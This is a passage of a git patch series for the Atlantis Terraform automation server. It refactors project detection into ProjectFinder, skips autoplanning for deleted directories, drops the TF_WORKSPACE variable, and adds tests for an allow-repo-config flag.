+   If you wanted, you could manually delete the plan and lock from the UI if you weren't ready to apply. Instead, we will apply it!
+
+1. To $terraform apply$ this change (which does nothing because it is creating a $null_resource$), type:
+    $$$
+    atlantis apply
+    $$$
+
+1. Finally, merge the pull request to unlock this directory.
+
+Thank you for trying out Atlantis! Next, try using Atlantis on your own repositories: [www.runatlantis.io/guide/getting-started.html](https://www.runatlantis.io/guide/getting-started.html).`, "$", "`", -1)
 
 // Start begins the testdrive process.
 // nolint: errcheck

From 85a775b94b098fddc9fe90dcf3fb1ca86ea34038 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Mon, 2 Jul 2018 14:39:39 +0200
Subject: [PATCH 66/69] Fix todos. Remove TF_WORKSPACE.

---
 server/events/project_command_builder.go    | 46 +--------------------
 server/events/project_finder.go             | 43 +++++++++++++++++++
 server/events/runtime/plan_step_runner.go   | 10 ++---
 server/events/terraform/terraform_client.go | 18 ++------
 server/events/vcs/client_test.go            |  1 -
 server/logging/logging_test.go              |  1 -
 server/recovery/recovery_test.go            |  1 -
 7 files changed, 53 insertions(+), 67 deletions(-)

diff --git a/server/events/project_command_builder.go b/server/events/project_command_builder.go
index cff97ed38c..9c89478396 100644
--- a/server/events/project_command_builder.go
+++ b/server/events/project_command_builder.go
@@ -3,11 +3,8 @@ package events
 import (
 	"fmt"
 	"os"
-	"path/filepath"
 
-	"github.com/docker/docker/pkg/fileutils"
 	"github.com/hashicorp/go-version"
-	"github.com/pkg/errors"
 	"github.com/runatlantis/atlantis/server/events/models"
 	"github.com/runatlantis/atlantis/server/events/vcs"
 	"github.com/runatlantis/atlantis/server/events/yaml"
@@ -101,7 +98,7 @@ func (p *DefaultProjectCommandBuilder) BuildAutoplanCommands(ctx *CommandContext
 	} else {
 		// Otherwise, we use the projects that match the WhenModified fields
 		// in the config file.
-		matchingProjects, err := p.matchingProjects(ctx.Log, modifiedFiles, config)
+		matchingProjects, err := p.ProjectFinder.DetermineProjectsViaConfig(ctx.Log, modifiedFiles, config, repoDir)
 		if err != nil {
 			return nil, err
 		}
@@ -227,44 +224,3 @@ func (p *DefaultProjectCommandBuilder) getCfg(projectName string, dir string, wo
 	}
 	return &projCfgs[0], &globalCfg, nil
 }
-
-// matchingProjects returns the list of projects whose WhenModified fields match
-// any of the modifiedFiles.
-func (p *DefaultProjectCommandBuilder) matchingProjects(log *logging.SimpleLogger, modifiedFiles []string, config valid.Config) ([]valid.Project, error) {
-	var projects []valid.Project
-	for _, project := range config.Projects {
-		log.Debug("checking if project at dir %q workspace %q was modified", project.Dir, project.Workspace)
-		if !project.Autoplan.Enabled {
-			log.Debug("autoplan disabled, ignoring")
-			continue
-		}
-		// Prepend project dir to when modified patterns because the patterns
-		// are relative to the project dirs but our list of modified files is
-		// relative to the repo root.
-		var whenModifiedRelToRepoRoot []string
-		for _, wm := range project.Autoplan.WhenModified {
-			whenModifiedRelToRepoRoot = append(whenModifiedRelToRepoRoot, filepath.Join(project.Dir, wm))
-		}
-		pm, err := fileutils.NewPatternMatcher(whenModifiedRelToRepoRoot)
-		if err != nil {
-			return nil, errors.Wrapf(err, "matching modified files with patterns: %v", project.Autoplan.WhenModified)
-		}
-
-		// If any of the modified files matches the pattern then this project is
-		// considered modified.
-		for _, file := range modifiedFiles {
-			match, err := pm.Matches(file)
-			if err != nil {
-				log.Debug("match err for file %q: %s", file, err)
-				continue
-			}
-			if match {
-				log.Debug("file %q matched pattern", file)
-				projects = append(projects, project)
-				break
-			}
-		}
-	}
-	// todo: check if dir is deleted though
-	return projects, nil
-}
diff --git a/server/events/project_finder.go b/server/events/project_finder.go
index 315f480bd5..254e51c3c6 100644
--- a/server/events/project_finder.go
+++ b/server/events/project_finder.go
@@ -19,7 +19,10 @@ import (
 	"path/filepath"
 	"strings"
 
+	"github.com/docker/docker/pkg/fileutils"
+	"github.com/pkg/errors"
 	"github.com/runatlantis/atlantis/server/events/models"
+	"github.com/runatlantis/atlantis/server/events/yaml/valid"
 	"github.com/runatlantis/atlantis/server/logging"
 )
 
@@ -30,6 +33,7 @@ type ProjectFinder interface {
 	// DetermineProjects returns the list of projects that were modified based on
 	// the modifiedFiles. The list will be de-duplicated.
 	DetermineProjects(log *logging.SimpleLogger, modifiedFiles []string, repoFullName string, repoDir string) []models.Project
+	DetermineProjectsViaConfig(log *logging.SimpleLogger, modifiedFiles []string, config valid.Config, repoDir string) ([]valid.Project, error)
 }
 
 // DefaultProjectFinder implements ProjectFinder.
@@ -72,6 +76,45 @@ func (p *DefaultProjectFinder) DetermineProjects(log *logging.SimpleLogger, modi
 	return projects
 }
 
+func (p *DefaultProjectFinder) DetermineProjectsViaConfig(log *logging.SimpleLogger, modifiedFiles []string, config valid.Config, repoDir string) ([]valid.Project, error) {
+	var projects []valid.Project
+	for _, project := range config.Projects {
+		log.Debug("checking if project at dir %q workspace %q was modified", project.Dir, project.Workspace)
+		if !project.Autoplan.Enabled {
+			log.Debug("autoplan disabled, ignoring")
+			continue
+		}
+		// Prepend project dir to when modified patterns because the patterns
+		// are relative to the project dirs but our list of modified files is
+		// relative to the repo root.
+		var whenModifiedRelToRepoRoot []string
+		for _, wm := range project.Autoplan.WhenModified {
+			whenModifiedRelToRepoRoot = append(whenModifiedRelToRepoRoot, filepath.Join(project.Dir, wm))
+		}
+		pm, err := fileutils.NewPatternMatcher(whenModifiedRelToRepoRoot)
+		if err != nil {
+			return nil, errors.Wrapf(err, "matching modified files with patterns: %v", project.Autoplan.WhenModified)
+		}
+
+		// If any of the modified files matches the pattern then this project is
+		// considered modified.
+		for _, file := range modifiedFiles {
+			match, err := pm.Matches(file)
+			if err != nil {
+				log.Debug("match err for file %q: %s", file, err)
+				continue
+			}
+			if match {
+				log.Debug("file %q matched pattern", file)
+				projects = append(projects, project)
+				break
+			}
+		}
+	}
+	// todo: check if dir is deleted though
+	return projects, nil
+}
+
 func (p *DefaultProjectFinder) filterToTerraform(files []string) []string {
 	var filtered []string
 	for _, fileName := range files {
diff --git a/server/events/runtime/plan_step_runner.go b/server/events/runtime/plan_step_runner.go
index 88f4abc2d9..00fe94df73 100644
--- a/server/events/runtime/plan_step_runner.go
+++ b/server/events/runtime/plan_step_runner.go
@@ -88,11 +88,11 @@ func (p *PlanStepRunner) switchWorkspace(ctx models.ProjectCommandContext, path
 		}
 	}
 
-	// Finally we'll have to select the workspace. Although we end up running
-	// with TF_WORKSPACE set, we need to figure out if this workspace exists so
-	// we can create it if it doesn't. To do this we can either select and catch
-	// the error or use list and then look for the workspace. Both commands take
-	// the same amount of time so that's why we're running select here.
+	// Finally we'll have to select the workspace. We need to figure out if this
+	// workspace exists so we can create it if it doesn't.
+	// To do this we can either select and catch the error or use list and then
+	// look for the workspace. Both commands take the same amount of time so
+	// that's why we're running select here.
 	_, err := p.TerraformExecutor.RunCommandWithVersion(ctx.Log, path, []string{workspaceCmd, "select", "-no-color", ctx.Workspace}, tfVersion, ctx.Workspace)
 	if err != nil {
 		// If terraform workspace select fails we run terraform workspace
diff --git a/server/events/terraform/terraform_client.go b/server/events/terraform/terraform_client.go
index bd2e6de704..b34516c7c7 100644
--- a/server/events/terraform/terraform_client.go
+++ b/server/events/terraform/terraform_client.go
@@ -45,16 +45,13 @@ const terraformPluginCacheDirName = "plugin-cache"
 var versionRegex = regexp.MustCompile("Terraform v(.*)\n")
 
 func NewClient(dataDir string) (*DefaultClient, error) {
-	// todo: use exec.LookPath to find out if we even have terraform rather than
-	// parsing the error looking for a not found error.
+	_, err := exec.LookPath("terraform")
+	if err != nil {
+		return nil, errors.New("terraform not found in $PATH. \n\nDownload terraform from https://www.terraform.io/downloads.html")
+	}
 	versionCmdOutput, err := exec.Command("terraform", "version").CombinedOutput() // #nosec
 	output := string(versionCmdOutput)
 	if err != nil {
-		// exec.go line 35, Error() returns
-		// "exec: " + strconv.Quote(e.Name) + ": " + e.Err.Error()
-		if err.Error() == fmt.Sprintf("exec: \"terraform\": %s", exec.ErrNotFound.Error()) {
-			return nil, errors.New("terraform not found in $PATH. \n\nDownload terraform from https://www.terraform.io/downloads.html")
-		}
 		return nil, errors.Wrapf(err, "running terraform version: %s", output)
 	}
 	match := versionRegex.FindStringSubmatch(output)
@@ -105,13 +102,6 @@ func (c *DefaultClient) RunCommandWithVersion(log *logging.SimpleLogger, path st
 		"TF_IN_AUTOMATION=true",
 		// Cache plugins so terraform init runs faster.
 		fmt.Sprintf("TF_PLUGIN_CACHE_DIR=%s", c.terraformPluginCacheDir),
-		// Terraform will run all commands in this workspace. We should have
-		// already selected this workspace but this is a fail-safe to ensure
-		// we're operating in the right workspace.
-		fmt.Sprintf("TF_WORKSPACE=%s", workspace),
-		// We're keeping this variable even though it duplicates TF_WORKSPACE
-		// because it's probably safer for users to rely on it. Terraform might
-		// change the way TF_WORKSPACE works in the future.
 		fmt.Sprintf("WORKSPACE=%s", workspace),
 		fmt.Sprintf("ATLANTIS_TERRAFORM_VERSION=%s", tfVersionStr),
 		fmt.Sprintf("DIR=%s", path),
diff --git a/server/events/vcs/client_test.go b/server/events/vcs/client_test.go
index 61060cd3b2..08ab443935 100644
--- a/server/events/vcs/client_test.go
+++ b/server/events/vcs/client_test.go
@@ -13,5 +13,4 @@
 //
 package vcs
 
-// todo: actually test
 // purposefully empty to trigger coverage report
diff --git a/server/logging/logging_test.go b/server/logging/logging_test.go
index f5cf867ba0..1eb24dc29c 100644
--- a/server/logging/logging_test.go
+++ b/server/logging/logging_test.go
@@ -13,5 +13,4 @@
 //
 package logging_test
 
-// todo: actually test
 // purposefully empty to trigger coverage report
diff --git a/server/recovery/recovery_test.go b/server/recovery/recovery_test.go
index 0d53553159..4e2e247299 100644
--- a/server/recovery/recovery_test.go
+++ b/server/recovery/recovery_test.go
@@ -13,5 +13,4 @@
 //
 package recovery_test
 
-// todo: actually test
 // purposefully empty to trigger coverage report

From 8effd01125f66645efee6c9938e8b5d4584ea19b Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Mon, 2 Jul 2018 19:01:40 +0200
Subject: [PATCH 67/69] Test new allow-repo-config flag

---
 cmd/server_test.go | 13 +++++++++++++
 1 file changed, 13 insertions(+)

diff --git a/cmd/server_test.go b/cmd/server_test.go
index 4a41f72060..589dc6802b 100644
--- a/cmd/server_test.go
+++ b/cmd/server_test.go
@@ -278,6 +278,7 @@ func TestExecute_Defaults(t *testing.T) {
 	Ok(t, err)
 	Equals(t, "http://"+hostname+":4141", passedConfig.AtlantisURL)
 	Equals(t, false, passedConfig.AllowForkPRs)
+	Equals(t, false, passedConfig.AllowRepoConfig)
 
 	// Get our home dir since that's what gets defaulted to
 	dataDir, err := homedir.Expand("~/.atlantis")
@@ -361,6 +362,7 @@ func TestExecute_Flags(t *testing.T) {
 	c := setup(map[string]interface{}{
 		cmd.AtlantisURLFlag:     "url",
 		cmd.AllowForkPRsFlag:    true,
+		cmd.AllowRepoConfigFlag: true,
 		cmd.DataDirFlag:         "/path",
 		cmd.GHHostnameFlag:      "ghhostname",
 		cmd.GHTokenFlag:         "token",
@@ -382,6 +384,7 @@ func TestExecute_Flags(t *testing.T) {
 
 	Equals(t, "url", passedConfig.AtlantisURL)
 	Equals(t, true, passedConfig.AllowForkPRs)
+	Equals(t, true, passedConfig.AllowRepoConfig)
 	Equals(t, "/path", passedConfig.DataDir)
 	Equals(t, "ghhostname", passedConfig.GithubHostname)
 	Equals(t, "token", passedConfig.GithubToken)
@@ -404,6 +407,7 @@ func TestExecute_ConfigFile(t *testing.T) {
 	tmpFile := tempFile(t, `---
 atlantis-url: "url"
 allow-fork-prs: true
+allow-repo-config: true
 data-dir: "/path"
 gh-hostname: "ghhostname"
 gh-token: "token"
@@ -429,6 +433,7 @@ ssl-key-file: key-file
 	Ok(t, err)
 	Equals(t, "url", passedConfig.AtlantisURL)
 	Equals(t, true, passedConfig.AllowForkPRs)
+	Equals(t, true, passedConfig.AllowRepoConfig)
 	Equals(t, "/path", passedConfig.DataDir)
 	Equals(t, "ghhostname", passedConfig.GithubHostname)
 	Equals(t, "token", passedConfig.GithubToken)
@@ -451,6 +456,7 @@ func TestExecute_EnvironmentOverride(t *testing.T) {
 	tmpFile := tempFile(t, `---
 atlantis-url: "url"
 allow-fork-prs: true
+allow-repo-config: true
 data-dir: "/path"
 gh-hostname: "ghhostname"
 gh-token: "token"
@@ -473,6 +479,7 @@ ssl-key-file: key-file
 	for name, value := range map[string]string{
 		"ATLANTIS_URL":          "override-url",
 		"ALLOW_FORK_PRS":        "false",
+		"ALLOW_REPO_CONFIG":     "false",
 		"DATA_DIR":              "/override-path",
 		"GH_HOSTNAME":           "override-gh-hostname",
 		"GH_TOKEN":              "override-gh-token",
@@ -498,6 +505,7 @@ ssl-key-file: key-file
 	Ok(t, err)
 	Equals(t, "override-url", passedConfig.AtlantisURL)
 	Equals(t, false, passedConfig.AllowForkPRs)
+	Equals(t, false, passedConfig.AllowRepoConfig)
 	Equals(t, "/override-path", passedConfig.DataDir)
 	Equals(t, "override-gh-hostname", passedConfig.GithubHostname)
 	Equals(t, "override-gh-token", passedConfig.GithubToken)
@@ -520,6 +528,7 @@ func TestExecute_FlagConfigOverride(t *testing.T) {
 	tmpFile := tempFile(t, `---
 atlantis-url: "url"
 allow-fork-prs: true
+allow-repo-config: true
 data-dir: "/path"
 gh-hostname: "ghhostname"
 gh-token: "token"
@@ -541,6 +550,7 @@ ssl-key-file: key-file
 	c := setup(map[string]interface{}{
 		cmd.AtlantisURLFlag:     "override-url",
 		cmd.AllowForkPRsFlag:    false,
+		cmd.AllowRepoConfigFlag: false,
 		cmd.DataDirFlag:         "/override-path",
 		cmd.GHHostnameFlag:      "override-gh-hostname",
 		cmd.GHTokenFlag:         "override-gh-token",
@@ -584,6 +594,7 @@ func TestExecute_FlagEnvVarOverride(t *testing.T) {
 	for name, value := range map[string]string{
 		"ATLANTIS_URL":          "url",
 		"ALLOW_FORK_PRS":        "true",
+		"ALLOW_REPO_CONFIG":     "true",
 		"DATA_DIR":              "/path",
 		"GH_HOSTNAME":           "gh-hostname",
 		"GH_TOKEN":              "gh-token",
@@ -606,6 +617,7 @@ func TestExecute_FlagEnvVarOverride(t *testing.T) {
 	c := setup(map[string]interface{}{
 		cmd.AtlantisURLFlag:     "override-url",
 		cmd.AllowForkPRsFlag:    false,
+		cmd.AllowRepoConfigFlag: false,
 		cmd.DataDirFlag:         "/override-path",
 		cmd.GHHostnameFlag:      "override-gh-hostname",
 		cmd.GHTokenFlag:         "override-gh-token",
@@ -627,6 +639,7 @@ func TestExecute_FlagEnvVarOverride(t *testing.T) {
 
 	Equals(t, "override-url", passedConfig.AtlantisURL)
 	Equals(t, false, passedConfig.AllowForkPRs)
+	Equals(t, false, passedConfig.AllowRepoConfig)
 	Equals(t, "/override-path", passedConfig.DataDir)
 	Equals(t, "override-gh-hostname", passedConfig.GithubHostname)
 	Equals(t, "override-gh-token", passedConfig.GithubToken)

From b2bd90da616c047bec6bd1a75a36c2d75e468618 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Tue, 3 Jul 2018 13:32:17 +0200
Subject: [PATCH 68/69] Various fixes

- delete working dir when lock deleted
- check if dir still exists when looking at modified
- check if atlantis.yaml is allowed before parsing
---
 CHANGELOG.md                                |   8 +-
 server/events/mocks/mock_working_dir.go     |  47 ++++++
 server/events/project_command_builder.go    |  48 +++---
 server/events/project_finder.go             |   8 +-
 server/events/project_finder_test.go        | 160 ++++++++++++++++++++
 server/events/working_dir.go                |  33 +++-
 server/events/yaml/parser_validator.go      |  20 ++-
 server/events/yaml/parser_validator_test.go |   8 +
 server/locks_controller.go                  |  22 ++-
 server/locks_controller_test.go             |  23 ++-
 server/server.go                            |   2 +
 testing/temp_files.go                       |  24 +++
 12 files changed, 360 insertions(+), 43 deletions(-)

diff --git a/CHANGELOG.md b/CHANGELOG.md
index fc99816502..95db6b164e 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -1,9 +1,15 @@
 # v0.4.0-alpha
 
 ## Features
+* Autoplanning - Atlantis will automatically run `plan` on new pull requests and
+when new commits are pushed to the pull request.
+* New repository `atlantis.yaml` format that supports:
+    * Arbitrary step ordering
+    * Single config file for whole repository
+    * Controlling autoplanning
+* Moved docs to standalone website from the README.
 
 ## Bugfixes
-* Won't attempt to run plan in a directory that was deleted.
 
 ## Backwards Incompatibilities / Notes:
 
diff --git a/server/events/mocks/mock_working_dir.go b/server/events/mocks/mock_working_dir.go
index f9040a3303..8a84ea236f 100644
--- a/server/events/mocks/mock_working_dir.go
+++ b/server/events/mocks/mock_working_dir.go
@@ -63,6 +63,18 @@ func (mock *MockWorkingDir) Delete(r models.Repo, p models.PullRequest) error {
 	return ret0
 }
 
+func (mock *MockWorkingDir) DeleteForWorkspace(r models.Repo, p models.PullRequest, workspace string) error {
+	params := []pegomock.Param{r, p, workspace}
+	result := pegomock.GetGenericMockFrom(mock).Invoke("DeleteForWorkspace", params, []reflect.Type{reflect.TypeOf((*error)(nil)).Elem()})
+	var ret0 error
+	if len(result) != 0 {
+		if result[0] != nil {
+			ret0 = result[0].(error)
+		}
+	}
+	return ret0
+}
+
 func (mock *MockWorkingDir) VerifyWasCalledOnce() *VerifierWorkingDir {
 	return &VerifierWorkingDir{mock, pegomock.Times(1), nil}
 }
@@ -189,3 +201,38 @@ func (c *WorkingDir_Delete_OngoingVerification) GetAllCapturedArguments() (_para
 	}
 	return
 }
+
+func (verifier *VerifierWorkingDir) DeleteForWorkspace(r models.Repo, p models.PullRequest, workspace string) *WorkingDir_DeleteForWorkspace_OngoingVerification {
+	params := []pegomock.Param{r, p, workspace}
+	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "DeleteForWorkspace", params)
+	return &WorkingDir_DeleteForWorkspace_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type WorkingDir_DeleteForWorkspace_OngoingVerification struct {
+	mock              *MockWorkingDir
+	methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *WorkingDir_DeleteForWorkspace_OngoingVerification) GetCapturedArguments() (models.Repo, models.PullRequest, string) {
+	r, p, workspace := c.GetAllCapturedArguments()
+	return r[len(r)-1], p[len(p)-1], workspace[len(workspace)-1]
+}
+
+func (c *WorkingDir_DeleteForWorkspace_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.PullRequest, _param2 []string) {
+	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+	if len(params) > 0 {
+		_param0 = make([]models.Repo, len(params[0]))
+		for u, param := range params[0] {
+			_param0[u] = param.(models.Repo)
+		}
+		_param1 = make([]models.PullRequest, len(params[1]))
+		for u, param := range params[1] {
+			_param1[u] = param.(models.PullRequest)
+		}
+		_param2 = make([]string, len(params[2]))
+		for u, param := range params[2] {
+			_param2[u] = param.(string)
+		}
+	}
+	return
+}
diff --git a/server/events/project_command_builder.go b/server/events/project_command_builder.go
index 9c89478396..456825f0c2 100644
--- a/server/events/project_command_builder.go
+++ b/server/events/project_command_builder.go
@@ -2,9 +2,9 @@ package events
 
 import (
 	"fmt"
-	"os"
 
 	"github.com/hashicorp/go-version"
+	"github.com/pkg/errors"
 	"github.com/runatlantis/atlantis/server/events/models"
 	"github.com/runatlantis/atlantis/server/events/vcs"
 	"github.com/runatlantis/atlantis/server/events/yaml"
@@ -51,19 +51,22 @@ func (p *DefaultProjectCommandBuilder) BuildAutoplanCommands(ctx *CommandContext
 	}
 
 	// Parse config file if it exists.
-	ctx.Log.Debug("parsing config file")
-	config, err := p.ParserValidator.ReadConfig(repoDir)
-	if err != nil && !os.IsNotExist(err) {
-		return nil, err
+	var config valid.Config
+	hasConfigFile, err := p.ParserValidator.HasConfigFile(repoDir)
+	if err != nil {
+		return nil, errors.Wrapf(err, "looking for %s file in %q", yaml.AtlantisYAMLFilename, repoDir)
 	}
-	noAtlantisYAML := os.IsNotExist(err)
-	if noAtlantisYAML {
-		ctx.Log.Info("found no %s file", yaml.AtlantisYAMLFilename)
-	} else {
-		ctx.Log.Info("successfully parsed %s file", yaml.AtlantisYAMLFilename)
+	if hasConfigFile {
 		if !p.AllowRepoConfig {
 			return nil, fmt.Errorf("%s files not allowed because Atlantis is not running with --%s", yaml.AtlantisYAMLFilename, p.AllowRepoConfigFlag)
 		}
+		config, err = p.ParserValidator.ReadConfig(repoDir)
+		if err != nil {
+			return nil, err
+		}
+		ctx.Log.Info("successfully parsed %s file", yaml.AtlantisYAMLFilename)
+	} else {
+		ctx.Log.Info("found no %s file", yaml.AtlantisYAMLFilename)
 	}
 
 	// We'll need the list of modified files.
@@ -78,7 +81,7 @@ func (p *DefaultProjectCommandBuilder) BuildAutoplanCommands(ctx *CommandContext
 
 	// If there is no config file, then we try to plan for each project that
 	// was modified in the pull request.
-	if noAtlantisYAML {
+	if !hasConfigFile {
 		modifiedProjects := p.ProjectFinder.DetermineProjects(ctx.Log, modifiedFiles, ctx.BaseRepo.FullName, repoDir)
 		ctx.Log.Info("automatically determined that there were %d projects modified in this pull request: %s", len(modifiedProjects), modifiedProjects)
 		for _, mp := range modifiedProjects {
@@ -128,12 +131,14 @@ func (p *DefaultProjectCommandBuilder) BuildAutoplanCommands(ctx *CommandContext
 func (p *DefaultProjectCommandBuilder) BuildPlanCommand(ctx *CommandContext, cmd *CommentCommand) (models.ProjectCommandContext, error) {
 	var projCtx models.ProjectCommandContext
 
+	ctx.Log.Debug("building plan command")
 	unlockFn, err := p.WorkingDirLocker.TryLock(ctx.BaseRepo.FullName, cmd.Workspace, ctx.Pull.Num)
 	if err != nil {
 		return projCtx, err
 	}
 	defer unlockFn()
 
+	ctx.Log.Debug("cloning repository")
 	repoDir, err := p.WorkingDir.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, cmd.Workspace)
 	if err != nil {
 		return projCtx, err
@@ -190,21 +195,26 @@ func (p *DefaultProjectCommandBuilder) buildProjectCommandCtx(ctx *CommandContex
 }
 
 func (p *DefaultProjectCommandBuilder) getCfg(projectName string, dir string, workspace string, repoDir string) (*valid.Project, *valid.Config, error) {
-	globalCfg, err := p.ParserValidator.ReadConfig(repoDir)
-	if err != nil && !os.IsNotExist(err) {
-		return nil, nil, err
-	}
-	hasAtlantisYAML := !os.IsNotExist(err)
-	if !hasAtlantisYAML && projectName != "" {
-		return nil, nil, fmt.Errorf("cannot specify a project name unless an %s file exists to configure projects", yaml.AtlantisYAMLFilename)
+	hasConfigFile, err := p.ParserValidator.HasConfigFile(repoDir)
+	if err != nil {
+		return nil, nil, errors.Wrapf(err, "looking for %s file in %q", yaml.AtlantisYAMLFilename, repoDir)
 	}
-	if !hasAtlantisYAML {
+	if !hasConfigFile {
+		if projectName != "" {
+			return nil, nil, fmt.Errorf("cannot specify a project name unless an %s file exists to configure projects", yaml.AtlantisYAMLFilename)
+		}
 		return nil, nil, nil
 	}
+
 	if !p.AllowRepoConfig {
 		return nil, nil, fmt.Errorf("%s files not allowed because Atlantis is not running with --%s", yaml.AtlantisYAMLFilename, p.AllowRepoConfigFlag)
 	}
 
+	globalCfg, err := p.ParserValidator.ReadConfig(repoDir)
+	if err != nil {
+		return nil, nil, err
+	}
+
 	// If they've specified a project by name we look it up. Otherwise we
 	// use the dir and workspace.
 	if projectName != "" {
diff --git a/server/events/project_finder.go b/server/events/project_finder.go
index 254e51c3c6..07dfcd6c64 100644
--- a/server/events/project_finder.go
+++ b/server/events/project_finder.go
@@ -106,12 +106,16 @@ func (p *DefaultProjectFinder) DetermineProjectsViaConfig(log *logging.SimpleLog
 			}
 			if match {
 				log.Debug("file %q matched pattern", file)
-				projects = append(projects, project)
+				_, err := os.Stat(filepath.Join(repoDir, project.Dir))
+				if err == nil {
+					projects = append(projects, project)
+				} else {
+					log.Debug("project at dir %q not included because dir does not exist", project.Dir)
+				}
 				break
 			}
 		}
 	}
-	// todo: check if dir is deleted though
 	return projects, nil
 }
 
diff --git a/server/events/project_finder_test.go b/server/events/project_finder_test.go
index 82aa84b847..df84fd0945 100644
--- a/server/events/project_finder_test.go
+++ b/server/events/project_finder_test.go
@@ -20,6 +20,7 @@ import (
 	"testing"
 
 	"github.com/runatlantis/atlantis/server/events"
+	"github.com/runatlantis/atlantis/server/events/yaml/valid"
 	"github.com/runatlantis/atlantis/server/logging"
 	. "github.com/runatlantis/atlantis/testing"
 )
@@ -219,3 +220,162 @@ func TestDetermineProjects(t *testing.T) {
 		})
 	}
 }
+
+func TestDefaultProjectFinder_DetermineProjectsViaConfig(t *testing.T) {
+	/*
+		Create dir structure:
+
+		main.tf
+		project1/
+		  main.tf
+		project2/
+		  main.tf
+		modules/
+		  module/
+		    main.tf
+	*/
+	tmpDir, cleanup := DirStructure(t, map[string]interface{}{
+		"main.tf": nil,
+		"project1": map[string]interface{}{
+			"main.tf": nil,
+		},
+		"project2": map[string]interface{}{
+			"main.tf": nil,
+		},
+		"modules": map[string]interface{}{
+			"module": map[string]interface{}{
+				"main.tf": nil,
+			},
+		},
+	})
+	defer cleanup()
+
+	cases := []struct {
+		description  string
+		config       valid.Config
+		modified     []string
+		expProjPaths []string
+	}{
+		{
+			description: "autoplan disabled",
+			config: valid.Config{
+				Projects: []valid.Project{
+					{
+						Dir: ".",
+						Autoplan: valid.Autoplan{
+							Enabled: false,
+						},
+					},
+				},
+			},
+			modified:     []string{"main.tf"},
+			expProjPaths: nil,
+		},
+		{
+			description: "autoplan default",
+			config: valid.Config{
+				Projects: []valid.Project{
+					{
+						Dir: ".",
+						Autoplan: valid.Autoplan{
+							Enabled:      true,
+							WhenModified: []string{"**/*.tf"},
+						},
+					},
+				},
+			},
+			modified:     []string{"main.tf"},
+			expProjPaths: []string{"."},
+		},
+		{
+			description: "parent dir modified",
+			config: valid.Config{
+				Projects: []valid.Project{
+					{
+						Dir: "project",
+						Autoplan: valid.Autoplan{
+							Enabled:      true,
+							WhenModified: []string{"**/*.tf"},
+						},
+					},
+				},
+			},
+			modified:     []string{"main.tf"},
+			expProjPaths: nil,
+		},
+		{
+			description: "parent dir modified matches",
+			config: valid.Config{
+				Projects: []valid.Project{
+					{
+						Dir: "project1",
+						Autoplan: valid.Autoplan{
+							Enabled:      true,
+							WhenModified: []string{"../**/*.tf"},
+						},
+					},
+				},
+			},
+			modified:     []string{"main.tf"},
+			expProjPaths: []string{"project1"},
+		},
+		{
+			description: "dir deleted",
+			config: valid.Config{
+				Projects: []valid.Project{
+					{
+						Dir: "project3",
+						Autoplan: valid.Autoplan{
+							Enabled:      true,
+							WhenModified: []string{"*.tf"},
+						},
+					},
+				},
+			},
+			modified:     []string{"project3/main.tf"},
+			expProjPaths: nil,
+		},
+		{
+			description: "multiple projects",
+			config: valid.Config{
+				Projects: []valid.Project{
+					{
+						Dir: ".",
+						Autoplan: valid.Autoplan{
+							Enabled:      true,
+							WhenModified: []string{"*.tf"},
+						},
+					},
+					{
+						Dir: "project1",
+						Autoplan: valid.Autoplan{
+							Enabled:      true,
+							WhenModified: []string{"../modules/module/*.tf", "**/*.tf"},
+						},
+					},
+					{
+						Dir: "project2",
+						Autoplan: valid.Autoplan{
+							Enabled:      true,
+							WhenModified: []string{"**/*.tf"},
+						},
+					},
+				},
+			},
+			modified:     []string{"main.tf", "modules/module/another.tf", "project2/nontf.txt"},
+			expProjPaths: []string{".", "project1"},
+		},
+	}
+
+	for _, c := range cases {
+		t.Run(c.description, func(t *testing.T) {
+			pf := events.DefaultProjectFinder{}
+			projects, err := pf.DetermineProjectsViaConfig(logging.NewNoopLogger(), c.modified, c.config, tmpDir)
+			Ok(t, err)
+			Equals(t, len(c.expProjPaths), len(projects))
+			for i, proj := range projects {
+				Equals(t, c.expProjPaths[i], proj.Dir)
+			}
+		})
+	}
+}
diff --git a/server/events/working_dir.go b/server/events/working_dir.go
index 77fcc56985..191eb3c247 100644
--- a/server/events/working_dir.go
+++ b/server/events/working_dir.go
@@ -25,7 +25,7 @@ import (
 	"github.com/runatlantis/atlantis/server/logging"
 )
 
-const workspacePrefix = "repos"
+const workingDirPrefix = "repos"
 
 //go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_working_dir.go WorkingDir
 
@@ -39,6 +39,7 @@ type WorkingDir interface {
 	GetWorkingDir(r models.Repo, p models.PullRequest, workspace string) (string, error)
 	// Delete deletes the workspace for this repo and pull.
 	Delete(r models.Repo, p models.PullRequest) error
+	DeleteForWorkspace(r models.Repo, p models.PullRequest, workspace string) error
 }
 
 // FileWorkspace implements WorkingDir with the file system.
@@ -64,11 +65,13 @@ func (w *FileWorkspace) Clone(
 	// If the directory already exists, check if it's at the right commit.
 	// If so, then we do nothing.
 	if _, err := os.Stat(cloneDir); err == nil {
+		log.Debug("clone directory %q already exists, checking if it's at the right commit", cloneDir)
 		revParseCmd := exec.Command("git", "rev-parse", "HEAD") // #nosec
 		revParseCmd.Dir = cloneDir
 		output, err := revParseCmd.CombinedOutput()
 		if err != nil {
-			return "", errors.Wrapf(err, "running git rev-parse HEAD: %s", string(output))
+			log.Err("will re-clone repo, could not determine if was at correct commit: git rev-parse HEAD: %s: %s", err, string(output))
+			return w.forceClone(log, cloneDir, headRepo, p)
 		}
 		currCommit := strings.Trim(string(output), "\n")
 		if currCommit == p.HeadCommit {
@@ -76,12 +79,21 @@ func (w *FileWorkspace) Clone(
 			return cloneDir, nil
 		}
 		log.Debug("repo was already cloned but is not at correct commit, wanted %q got %q", p.HeadCommit, currCommit)
+		// We'll fall through to re-clone.
+	}
 
-		// It's okay to delete all plans now since they're out of date.
-		log.Info("cleaning clone directory %q", cloneDir)
